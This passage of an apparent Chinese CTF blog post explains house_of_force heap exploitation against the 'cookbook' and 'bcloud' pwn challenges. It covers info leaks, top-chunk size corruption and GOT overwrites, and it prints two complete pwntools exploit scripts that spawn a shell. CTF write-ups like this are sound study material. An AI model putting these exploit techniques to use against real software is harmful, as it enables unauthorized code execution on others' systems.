<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582247755837.png" width="60%" height="60%">

<p>第二个子函数就是初始化三个recipe（0x40C），当时直接拿着程序看的时候在这浪费了很多时间，因为根本不知道要干什么，以后碰到这种就先跑一下程序熟悉熟悉，看这些字符串出现在什么地方再逆，<code>ret_Ingredient_ptr</code>是根据name返回对应Ingredient结构体的指针Dish type应该不用管</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582248382621.png" width="100%" height="100%">

<p>不过这两个初始化函数用来逆结构体还是挺好的，这里把结构体放出来吧</p>
<h3 id="struct"><a href="#struct" class="headerlink" title="struct"></a>struct</h3><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582248526810.png" width="60%" height="60%">

<p>再来看<code>main_menu</code></p>
<h3 id="main-menu"><a href="#main-menu" class="headerlink" title="main_menu"></a>main_menu</h3><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582248585103.png" width="45%" height="45%">

<p>就是我们正常的菜单选择了，这里就不做细致分析了，没必要，我下面的这张图记录了每个函数大致的操作</p>
<h3 id="All-in-one"><a href="#All-in-one" class="headerlink" title="All in one"></a>All in one</h3><p><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582249392325.png" alt="1582249392325"></p>
<p>所有对应的选项我都记录了大致对应的操作，当然也不乏在调试中发现的一些小细节，比如creat recipe里面是删不掉Ingredient的，因为fegts结尾的<code>\n</code>程序没有处理，导致<code>strcmp</code>比对失败…</p>
<p>最后程序通过链表和不同结构体的管理如下图所示，我这里只拿了一个Ingredient和Recipe做示例</p>
<p><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582213398090.png" alt="1582213398090"></p>
<h2 id="漏洞分析-amp-Exploite"><a href="#漏洞分析-amp-Exploite" class="headerlink" title="漏洞分析&amp;Exploite"></a>漏洞分析&amp;Exploite</h2><h3 id="leak"><a href="#leak" class="headerlink" title="leak"></a>leak</h3><p>这个题的leak其实只要有经验的话应该马上就能想到，没有经验的话像我可能还稍微想了一段时间吧，当然也要注意这里面的chunk很多都是calloc出来的。当时我在想leak构造的时候第一反应是 creat recipe里面free时没有对current_pt赋值0，所以存在一个bad save，然后就可以打印出对应的东西，这里只有一个recipe chunk被free的时候就可以打印出来这个unsortedbin chunk上的*(*bk)处的值，这里是top_chunk的地址。</p>
<p>后来我想通过remove ingredient来给ingredient chunk的fd和bk处放上libc地址结果失败了，因为我发现这里根本删不了..坑，还以为是出了什么问题，不过依旧是这个思路，由于我们current_ptr是保存在.bss上的，所以我们可以，出去删了这个ingredient之后再回到这里leak，这样在打印price的时候就会leaklibc了，注意数量一定要设置1</p>
<h3 id="Arbitrary-write"><a href="#Arbitrary-write" class="headerlink" title="Arbitrary write"></a>Arbitrary write</h3><p>本题还有一个0x8C的大overflow我们没有用到，最开始我想的是能不能通过fastbin来attack一个地方，后来发现没什么思路就放弃了，因为house_of_force的方法在这里更明显一些，我们可以直接通过这个大overflow来修改top_chunk然后改写GOT表，最后调用<code>system(&quot;/bin/sh&quot;)</code>。当然改GOT表的过程特别玄学，由于只有Ingredient和cookbook name是malloc出来的，而bookname在我这个方法里面要在设置top_size之后用来设置new top的位置，所以我这里不能用bookname来更改GOT表，只能用Ingredient，但是调试过程中确实踩了很多坑，最后对应ingredient的位置很苛刻</p>
<img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582252497984.png" width="80%" height="80%">

<p>从前往后试这两个地方用来在设置topchunk的时候写size，前面的内存是不可写的(这里写一笔给记性差的自己：因为32位chunk要8bit对齐，所以只有结尾是4和C的地方才写size)，而后malloc ingredient时因为输入Ingredient-&gt;name的时候程序会calloc一块chunk出来，也就意味着0x98Bytes后的数据全部会被清零，所以很多数据都会受到连锁影响(跪。而且我试0x0804D004这个地方的时候发现，后面的malloc居然刚好把currentIng_ptr给设置成size字段了，以后在这些数据段操作之前一定先看看后面的一些特殊偏移有什么数据（….<code>&amp;currentIng_ptr-0x0804D000=0x9C(malloc_usable_size)</code>）出题人应该是估计苛刻的？<br>然后用0x0804D00C这个地方用来写size，最后使用哪个表作为system我用的是atoi（好像用free更方便一点）。然后输入name的时候由于fgets会损坏一个Byte的数据，所以我干脆把一些表项全填上去了，当我把要利用的函数的偏移一个个的填上去之后发现，利用的时候由于memcpy是cpy0x80个字节的数据，刚好把bss上的stdin和stdout给写没了，所以又去把stdin和stdout的地址写了上去才成功</p>
<h2 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> numpy</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'cookbook'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">ub_offset = <span class="number">0x3c4b30</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="comment">#log.info("\033[1;36m" +''+hex() + "\033[0m")</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main_choice</span><span class="params">(cha)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'[q]uit\n'</span>)</span><br><span class="line">	p.sendline(cha)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Ing_choice</span><span class="params">(cha)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'quit)?\n'</span>)</span><br><span class="line">	p.sendline(cha)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">recipe_choice</span><span class="params">(cha)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'[q]uit\n'</span>)</span><br><span class="line">	p.sendline(cha)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">creat_for_leak</span><span class="params">()</span>:</span></span><br><span class="line">	main_choice(<span class="string">'a'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'n'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'g'</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'********'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'e'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'q'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">creat_for_fill</span><span class="params">()</span>:</span></span><br><span class="line">	main_choice(<span class="string">'a'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'n'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'g'</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'********'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'e'</span>)</span><br><span class="line">	Ing_choice(<span class="string">'q'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak_heap</span><span class="params">()</span>:</span></span><br><span class="line">	main_choice(<span class="string">'c'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'n'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'a'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'to add? '</span>)</span><br><span class="line">	p.sendline(<span class="string">'********'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'many? (hex): '</span>)</span><br><span class="line">	p.sendline(<span class="string">'0x1'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'d'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'p'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">	heap_base=int(p.recvuntil(<span class="string">' -'</span>).strip(<span class="string">' -'</span>))<span class="number">-0x1780</span></span><br><span class="line">	recipe_choice(<span class="string">'q'</span>)</span><br><span class="line">	<span class="keyword">return</span> heap_base</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak_libc</span><span class="params">()</span>:</span></span><br><span class="line">	main_choice(<span class="string">'c'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'n'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'a'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'to add? '</span>)</span><br><span class="line">	p.sendline(<span class="string">'********'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'many? (hex): '</span>)</span><br><span class="line">	p.sendline(<span class="string">'0x1'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'q'</span>)</span><br><span class="line">	main_choice(<span class="string">'e'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'exterminate? '</span>)</span><br><span class="line">	p.sendline(<span class="string">'********'</span>)</span><br><span class="line">	main_choice(<span class="string">'c'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'p'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'$'</span>)</span><br><span class="line">	libc_base=int(p.recvuntil(<span class="string">'\n'</span>).strip(<span class="string">'\n'</span>))<span class="number">-0x1b27b0</span></span><br><span class="line">	recipe_choice(<span class="string">'q'</span>)</span><br><span class="line">	<span class="keyword">return</span> libc_base</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_topsize</span><span class="params">()</span>:</span></span><br><span class="line">	main_choice(<span class="string">'c'</span>)</span><br><span class="line">	recipe_choice(<span class="string">'g'</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'a'</span>*<span class="number">0x3c0</span>+p32(<span class="number">0xffffffff</span>))</span><br><span class="line">	recipe_choice(<span class="string">'q'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'your name?\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'ljc'</span>)</span><br><span class="line"></span><br><span class="line">creat_for_leak()</span><br><span class="line">heap_base=leak_heap()</span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> +<span class="string">'heap_base:'</span>+hex(heap_base) + <span class="string">"\033[0m"</span>)</span><br><span class="line">libc_base=leak_libc()</span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> +<span class="string">'libc_base:'</span>+hex(libc_base) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line">creat_for_fill()</span><br><span class="line">set_topsize()</span><br><span class="line"></span><br><span class="line"><span class="comment">#new_top-&gt;0x0804D000</span></span><br><span class="line"><span class="comment">#req = dest - old_top - 4*sizeof(long)</span></span><br><span class="line">req =numpy.array([<span class="number">0x0804D010</span>,],dtype=numpy.uint32)</span><br><span class="line">main_choice(<span class="string">'g'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'hacker!) : '</span>)</span><br><span class="line">req[<span class="number">0</span>]=req[<span class="number">0</span>]-(heap_base+<span class="number">0x17a0</span>)<span class="number">-4</span>*<span class="number">4</span></span><br><span class="line">log.info(hex(req[<span class="number">0</span>]))</span><br><span class="line">p.sendline(hex(req[<span class="number">0</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p,'b *0x08048D40')</span></span><br><span class="line">main_choice(<span class="string">'a'</span>)</span><br><span class="line">Ing_choice(<span class="string">'n'</span>)</span><br><span class="line">free  =<span class="number">0x1ec180</span></span><br><span class="line">memcpy=<span class="number">0x77610</span></span><br><span class="line">fgets =<span class="number">0x5e150</span></span><br><span class="line">alarm =<span class="number">0xb0270</span></span><br><span class="line">stk   =<span class="number">0</span></span><br><span class="line">malloc=<span class="number">0x1ec110</span></span><br><span class="line">puts  =<span class="number">0x5fca0</span></span><br><span class="line">g=<span class="number">0</span></span><br><span class="line">strtoul=<span class="number">0</span></span><br><span class="line">start=<span class="number">0</span></span><br><span class="line">buf=<span class="number">0</span></span><br><span class="line">system=<span class="number">0x3ada0</span></span><br><span class="line">calloc=<span class="number">0x1ec130</span></span><br><span class="line">Ing_choice(<span class="string">'g'</span>)</span><br><span class="line">name=p32(free+libc_base)+p32(memcpy+libc_base)+p32(fgets+libc_base)+p32(alarm+libc_base)+p32(stk)+p32(malloc+libc_base)+p32(puts+libc_base)+p32(g)+p32(strtoul)</span><br><span class="line">name+=p32(start)+p32(buf)+p32(system+libc_base)+p32(calloc+libc_base)</span><br><span class="line">name=name.ljust(<span class="number">0x68</span>,<span class="string">'\x00'</span>)</span><br><span class="line">name+=p32(<span class="number">0x1b25a0</span>+libc_base)</span><br><span class="line">name+=p32(<span class="number">0x1b2d60</span>+libc_base)</span><br><span class="line">p.sendline(name)</span><br><span class="line">Ing_choice(<span class="string">'s'</span>)</span><br><span class="line">p.sendline(<span class="string">'/bin/sh'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="bcloud"><a href="#bcloud" class="headerlink" title="bcloud"></a>bcloud</h1><h2 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h2><p>注：这个程序分析是在我写完题之后再来写的，可能会有很多东西会有剧透的既视感…主要是用来帮助自己以后看的</p>
<p>main就是很正常的菜单，就不多废话了，直接从其中做初始化的函数开始看</p>
<h3 id="初始化函数"><a href="#初始化函数" class="headerlink" title="初始化函数"></a>初始化函数</h3><p>0x0804899C:这个函数包括了两个函数，其中分别对应两个输入点</p>
<p>姑且称第一个是<code>input_name</code>，第二个是<code>input_org_host</code></p>
<h4 id="input-name"><a href="#input-name" class="headerlink" title="input_name"></a>input_name</h4><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582412657048.png" width="40%" height="40%">

<p>这里有一个比较坑的点我刚开始一直都没发现（当然还是自己太菜了），因为这个<code>readn_add0(ptr,n,chr)</code>是一个最多读取n个字符然后会在结尾处+0的函数，如果read过程中碰到chr就直接+0退出结束，也就是说如果我们输入了0x40个字符，他就会在0x41处补0。在这里，我们输入0x40之后他会把0补在V2这个变量处，随之被malloc的指针覆盖了，由于32位程序中指针都占4字节，所以覆盖之后这里直接连着堆指针一起strcpy进了chunk中，没有\x00截断。然后调用info输出了chunk中的内容</p>
<h4 id="input-org-host"><a href="#input-org-host" class="headerlink" title="input_org_host"></a>input_org_host</h4><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413141212.png" width="60%" height="60%">

<p>上面的trick在这里同样出现了一遍，当然这里主要是<code>org v2 host</code>这三个连在了一起，最后在strcpy的时候是一个比较大的溢出，由于v2对应的chunk紧跟的就是top_chunk，所以很自然能联想到<code>house_of_force</code></p>
<h3 id="new"><a href="#new" class="headerlink" title="new"></a>new</h3><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413440952.png" width="60%" height="60%">

<p>根据下标和记录存放malloc的ptr，lenth由我们输入然后会被存到<code>len_Array</code>中，接着根据lenth读入conent，由于malloc时lenth+4，所以构成不了overflow</p>
<h3 id="edit"><a href="#edit" class="headerlink" title="edit"></a>edit</h3><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413618572.png" width="40%" height="40%">

<p>没什么好说的了，就是根据存的len来读数据</p>
<h3 id="delete"><a href="#delete" class="headerlink" title="delete"></a>delete</h3><p><img src="/2020/02/22/how2heap-house-of-force-cookbook%E3%80%81bcloud/1582413728779.png" alt="1582413728779"></p>
<p>先把ptr存在栈上，清空记录然后<code>free(ptr)</code></p>
<p>其他的函数都好像没什么用就不用管了</p>
<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><p>主要就是第二个初始化<code>input_org_host</code>中产生的<code>house_of_force</code>，先将top_chunk.size根据溢出赋值成<code>0xffffffff</code>，然后malloc一个负数设置<code>top_chunk</code>，之后再利用edit就好了，主要就是得发现<code>house_of_force</code>这个洞23333</p>
<p>接着就是在我们的ptr_Array上玩了，我设置的dest稍微在array上面一点，主要是当时免得出错，反正edit的时候可以打pad，当我们用设置好top之后，id0被占用，再新malloc出来用来写Array的chunk会放在index1，当然这个chunk我只写了一次，只用把对应的东西布置好就行了，具体布置什么见以下</p>
<p>由于我们最终的目的是要getshell，仅仅只有一个heap_base肯定是不行的，我们还需要leak一个libc的地址，这里我稍微想了一会，至于libc地址现在可以存在于三个地方：stack、got或者非fastbin链中的chunk。我最开始想的是：通过再malloc一个大一点的chunk之后free，然后在array上就有libc地址了，通过写一个array上的记录指向这个地址就可以打印，但是怎么打印呢，一般打印的方法有通过程序中有输出点的地方打印，或者通过栈溢出控制函数参数、返回地址到puts_plt这样打印，可是这个程序既没有打印chunk的函数…..也无法栈溢出或者泄露栈地址什么的，但是我想到能够设置一个GOT表然后调用edit修改，我们手上暂时又只有程序的地址可以用，所以我就找了一下有什么函数可以用来接受一个地址然后输出的（因为我们程序中使用Array中的数据而且调用到库函数的只有free），刚好有一个函数<code>0x08048779</code>，是接受一个地址然后打<code>%s</code>，这大概就是出题人故意设置的吧2333。所以把free的GOT改成这个函数就可以了，free的GOT表项后面是<code>__stack_chk_fail</code>，不会影响什么</p>
<p>不过我最开始的那个思路free一个大一点的chunk失败了，所以就转而想到了更简单的方法，利用GOT表</p>
<p>然后我们的Array上现在只需要有一样东西就行：GOT表地址。一个用来改free的GOT，一个用来leak</p>
<p>leak之后再把free的GOT改成system，然后malloc一个<code>/bin/sh\x00</code>的chunk，然后free就好了</p>
<p>好像也可以改atoi的GOT更方便一些（或者当修改GOT表影响了相邻表项会出错时可以试试）不过这里就不做多余的事了，getshell就行</p>
<h2 id="完整EXP-1"><a href="#完整EXP-1" class="headerlink" title="完整EXP"></a>完整EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'bcloud'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">ub_offset = <span class="number">0x3c4b30</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new</span><span class="params">(len,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'the note content:\n'</span>)</span><br><span class="line">	p.sendline(str(len))</span><br><span class="line">	p.recvuntil(<span class="string">'the content:\n'</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(id,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'the id:\n'</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">	p.recvuntil(<span class="string">'new content:\n'</span>)</span><br><span class="line">	loginfo(<span class="string">''</span>,<span class="number">0</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(id)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'the id:'</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">p.recvuntil(<span class="string">'your name:\n'</span>)</span><br><span class="line">p.send(<span class="string">'a'</span>*<span class="number">0x40</span>)</span><br><span class="line">p.recvuntil(<span class="string">'a'</span>*<span class="number">0x40</span>)</span><br><span class="line">heap_base=my_u32(p.recv(<span class="number">4</span>))<span class="number">-0x8</span></span><br><span class="line">loginfo(<span class="string">'heap_base'</span>,heap_base)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Org:\n'</span>)</span><br><span class="line">p.send(<span class="string">'a'</span>*<span class="number">0x40</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Host:\n'</span>)</span><br><span class="line">p.sendline(<span class="string">'\xff'</span>*<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">dest=<span class="number">0x0804B110</span></span><br><span class="line">old_top=heap_base+<span class="number">0xd8</span></span><br><span class="line">corrupt_size=dest-old_top<span class="number">-4</span>*<span class="number">4</span><span class="number">-4</span></span><br><span class="line"><span class="comment">#req = dest - old_top - 4*sizeof(long</span></span><br><span class="line">leakfunction=<span class="number">0x08048779</span></span><br><span class="line">free_got=<span class="number">0x0804B014</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">'b *0x08048b4f'</span>)</span><br><span class="line">new(corrupt_size,<span class="string">'\n'</span>)<span class="comment">#set top</span></span><br><span class="line">new(<span class="number">0x18</span>,<span class="string">'a'</span>*<span class="number">0x10</span>+p32(<span class="number">0x0804B03C</span>)+p32(free_got)+<span class="string">'\n'</span>)<span class="comment">#id 0 1 atoi_got</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">1</span>,p32(leakfunction)+<span class="string">'\n'</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Hey '</span>)</span><br><span class="line">libc_base=my_u32(p.recv(<span class="number">4</span>))<span class="number">-0x2d250</span></span><br><span class="line">loginfo(<span class="string">'libc base'</span>,libc_base)</span><br><span class="line">system=<span class="number">0x3ada0</span>+libc_base</span><br><span class="line">edit(<span class="number">1</span>,p32(system)+<span class="string">'\n'</span>)</span><br><span class="line">new(<span class="number">0x8</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/how2heap/" rel="tag"># how2heap</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/17/how2heap-house-of-lore-overlapping-chunks-2/" rel="prev" title="how2heap - house_of_lore&overlapping_chunks_2">
      <i class="fa fa-chevron-left"></i> how2heap - house_of_lore&overlapping_chunks_2
    </a></div>
      <div class="post-nav-item">
